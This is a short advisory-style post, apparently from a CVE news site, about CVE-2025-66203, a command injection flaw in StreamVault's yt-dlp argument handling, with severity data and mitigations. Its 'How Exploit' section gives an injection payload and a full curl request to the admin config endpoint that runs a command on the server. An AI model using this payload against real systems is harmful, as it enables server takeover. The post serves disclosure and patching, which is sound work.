Listen to this Post
The vulnerability arises because the StreamVault application, prior to version 251126, allows authenticated administrators to configure arguments for the `yt-dlp` tool via the `/admin/api/saveConfig` endpoint. The application fails to properly validate or sanitize these arguments before storing them globally. Subsequently, when the `YtDlpUtil.java` component constructs a system command to execute yt-dlp, it incorporates these unsanitized arguments directly into the command line. An attacker with administrative privileges can inject arbitrary OS commands by crafting malicious arguments (e.g., using command chaining operators like ;, &&, or ||). Because the arguments are stored and used in a privileged context, this injection leads to remote code execution (RCE) on the underlying server, allowing the attacker to fully compromise the system’s confidentiality, integrity, and availability .
dailycve form:
Platform: StreamVault
Version: < 251126
Vulnerability : OS Command Injection
Severity: Critical
date: 2025-12-26
Prediction: Patch exists (251126)
What Undercode Say:
Analytics
- CVE ID: CVE-2025-66203
- CWE: CWE-78 (OS Command Injection)
- CVSS Score: 9.9 (Critical)
- Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
- Exploitability: Network, Low Complexity, Low Privileges Required
- Impact: Complete loss of confidentiality, integrity, and availability.
- EPSS Score (2026-01-01): 0.29% (52nd percentile)
How Exploit:
1. Authenticate to the StreamVault admin panel.
- Craft a malicious payload for the `yt-dlp` arguments. For example, to execute the `id` command:
--exec "%()s; id; "
- Send a POST request to the `/admin/api/saveConfig` endpoint with the malicious arguments.
curl -X POST http://target-streamvault.com/admin/api/saveConfig \ -H "Cookie: session=YOUR_ADMIN_SESSION_COOKIE" \ -H "Content-Type: application/json" \ -d '{"ytdlpargs": "--exec \"%()s; id; \""}' - Trigger a download or any action that causes the application to invoke
yt-dlp. The injected command (id) will execute on the server.
Protection from this CVE
- Immediate Patching: Upgrade StreamVault to version 251126 or later .
- Input Validation: Implement a strict allowlist for `yt-dlp` arguments on the server-side, rejecting any characters used for command chaining (e.g.,
;,&,|,`). - Principle of Least Privilege: Avoid running the StreamVault process with unnecessary high-level system privileges.
- Web Application Firewall (WAF): Deploy WAF rules to block malicious requests to `/admin/api/saveConfig` containing common command injection patterns.
Impact
Successful exploitation allows an authenticated administrator (or an attacker who has compromised admin credentials) to execute arbitrary system commands on the host running StreamVault. This leads to a full system takeover, enabling data theft, installation of backdoors, lateral movement within the network, and potential disruption of services .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

